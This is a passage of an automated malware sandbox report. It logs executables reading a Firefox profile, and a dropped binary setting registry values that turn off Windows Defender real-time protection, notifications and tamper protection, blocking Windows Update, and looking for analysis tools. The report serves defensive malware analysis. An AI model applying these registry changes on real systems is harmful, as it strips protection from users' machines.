                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\System32\WinMetadata\Windows.Globalization.winmd VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Controls.Ribbon\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Controls.Ribbon.dll VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices.WindowsRuntime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.InteropServices.WindowsRuntime.dll VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\System32\WinMetadata\Windows.Data.winmd VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WPFFA17.tmp VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00BDCBEA
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                              Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                              Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                              Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeRegistry value created: TamperProtection 0
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
